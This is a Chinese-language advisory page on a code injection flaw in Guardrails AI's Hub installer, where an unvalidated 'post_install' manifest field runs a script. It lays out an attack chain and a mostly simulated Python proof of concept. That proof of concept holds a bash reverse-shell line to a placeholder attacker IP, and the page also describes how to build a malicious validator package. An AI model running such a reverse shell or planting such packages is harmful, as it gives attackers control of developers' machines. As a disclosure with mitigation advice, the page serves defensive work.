CVE-2026-31233 CVSS 9.8 严重

CVE-2026-31233 Guardrails AI代码注入漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31233

漏洞类型

代码注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Guardrails AI

漏洞概述

Guardrails AI 0.6.7及之前版本在Hub包安装机制中存在代码注入漏洞（CWE-94）。当用户使用`guardrails hub install`安装验证器包时，系统会从Guardrails Hub获取清单文件，并动态执行`post_install`字段中指定的脚本。由于脚本路径是基于未经验证的不受信任数据构建的，且缺乏适当的清理，允许远程代码执行。攻击者可以通过发布恶意包到Hub，在受害者安装该包的系统上注入并执行任意代码。

技术细节

该漏洞的根本原因在于Guardrails AI在处理Hub包安装时，过度信任来自远程仓库的manifest数据。具体流程中，客户端解析manifest文件中的`post_install`字段，将其直接作为脚本路径进行系统调用或执行，而未对路径进行合法性校验、沙箱隔离或输入清理。攻击者只需构造一个包含恶意路径的manifest文件，并将对应的恶意包上传至Hub。一旦受害者执行安装命令，客户端将自动下载并解析该manifest，进而触发系统命令执行。由于攻击向量为网络（AV:N），无需认证（PR:N）且无需用户交互（UI:N），该漏洞极易被利用，导致攻击者获得目标系统的完全控制权，造成机密性、完整性和可用性的全面破坏。

攻击链分析

STEP 1

1. 恶意包构造

攻击者准备一个包含恶意脚本（如反弹Shell）的包，并编写包含恶意的`post_install`字段的manifest文件。

STEP 2

2. 发布恶意包

攻击者将恶意包和manifest发布到Guardrails Hub。

STEP 3

3. 诱导安装

受害者（开发者或系统）执行`guardrails hub install`命令安装该看似正常的验证器包。

STEP 4

4. 解析与执行

Guardrails客户端下载manifest，读取`post_install`字段，并在无验证的情况下执行指定的脚本。

STEP 5

5. 获取权限

恶意脚本在受害者的系统上运行，攻击者获得远程代码执行权限及系统控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-31233
# This script simulates a malicious package manifest creation.

import json

# 1. Define the malicious payload (e.g., reverse shell)
# In a real attack, this would be hosted on the attacker's server.
malicious_script_content = "#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

# 2. Construct the malicious manifest
# The 'post_install' field points to the malicious script
malicious_manifest = {
    "package_name": "fake-validator",
    "version": "1.0.0",
    "post_install": "setup.sh",  # Vulnerability: Untrusted path executed
    "manifest_version": "1.0"
}

# 3. Simulate the vulnerable installation process
def vulnerable_install(manifest):
    print(f"[*] Installing {manifest['package_name']}...")
    script_path = manifest['post_install']
    
    # VULNERABLE CODE: Executing script path from untrusted source without validation
    print(f"[!] Executing post_install script: {script_path}")
    # os.system(script_path) # This is where the RCE happens

if __name__ == "__main__":
    print("--- Malicious Manifest Generated ---")
    print(json.dumps(malicious_manifest, indent=2))
    print("\n--- Simulating Victim Installation ---")
    vulnerable_install(malicious_manifest)

影响范围

Guardrails AI <= 0.6.7

防御指南

临时缓解措施

在未升级版本前，建议严格审查所有通过Hub安装的包，避免安装来源不明的验证器。可以在隔离的沙箱环境中测试包的安装过程，以检测是否存在异常的脚本执行行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表